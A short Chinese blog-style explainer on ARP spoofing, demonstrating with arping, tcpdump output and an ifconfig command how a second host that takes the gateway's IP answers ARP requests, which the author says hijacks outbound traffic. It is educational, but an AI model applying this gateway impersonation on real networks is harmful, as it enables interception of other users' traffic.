一看到ARP就想起以前在武汉租房子,租户之间简直就是网络大战啊,各种网络执行官,P2P终结者,以及用刚火起来的360每天都能看到有ARP攻击的信息,虽然不明白是啥玩意,但是感觉很牛逼的样子
ARP欺骗是欺骗IP地址同MAC地址之间的对应关系
在通信的时候,在发送IP包之前,会在ARP表中找一下IP对应的MAC地址,假如没有找到,就发送一个ARP广播,找到了之后,更新一下ARP缓存,将包发出去;这里的ARP表并不是一尘不变,而是有刷新时间的
ARP的欺骗多种多样,单向的,双向的,伪装网关,主机等等,下面是一种简单的伪造网关的情况,仅仅测试为了说明问题,而不是真正的欺骗,这里用到arping
1:正常情况下,给网管发送ARP请求
# arping -i eth1 10.8.160.1
2:请求主机会收到reply信息
# tcpdump -i eth1 arp src host 10.8.160.1 -en tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth1, link-type EN10MB (Ethernet), capture size 65535 bytes 13:20:19.330365 50:1c:bf:82:bb:cc > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 60: Reply 10.8.160.1 is-at 50:1c:bf:82:bb:cc, length 46 13:20:20.324580 50:1c:bf:82:bb:cc > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 60: Reply 10.8.160.1 is-at 50:1c:bf:82:bb:cc, length 46 13:20:21.325718 50:1c:bf:82:bb:cc > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 60: Reply 10.8.160.1 is-at 50:1c:bf:82:bb:cc, length 46 13:20:22.326955 50:1c:bf:82:bb:cc > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 60: Reply 10.8.160.1 is-at 50:1c:bf:82:bb:cc, length 46
3:将另一台主机伪装成网关
# ifconfig eth1 10.8.160.1
4:依旧对着网关发送请求
# arping -i eth1 10.8.160.1
5:此时会实时收到两条不同的reply,可以对比MAC地址得出,伪装的网关和真实的网关都在进行回复
# tcpdump -i eth1 arp src host 10.8.160.1 -en tcpdump: verbose output suppressed, use -v or -vv for full protocol decode listening on eth1, link-type EN10MB (Ethernet), capture size 65535 bytes 13:25:18.421457 fa:16:3e:ab:1d:c3 > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 42: Reply 10.8.160.1 is-at fa:16:3e:ab:1d:c3, length 28 13:25:18.429627 50:1c:bf:82:bb:cc > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 60: Reply 10.8.160.1 is-at 50:1c:bf:82:bb:cc, length 46 13:25:19.422435 fa:16:3e:ab:1d:c3 > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 42: Reply 10.8.160.1 is-at fa:16:3e:ab:1d:c3, length 28 13:25:19.422944 50:1c:bf:82:bb:cc > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 60: Reply 10.8.160.1 is-at 50:1c:bf:82:bb:cc, length 46 13:25:20.423565 fa:16:3e:ab:1d:c3 > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 42: Reply 10.8.160.1 is-at fa:16:3e:ab:1d:c3, length 28 13:25:20.424061 50:1c:bf:82:bb:cc > fa:16:3e:37:24:3c, ethertype ARP (0x0806), length 60: Reply 10.8.160.1 is-at 50:1c:bf:82:bb:cc, length 46
如此一来,可以看到而已机器伪装成了网关,回应了ARP请求,从而劫持了所有的出口流量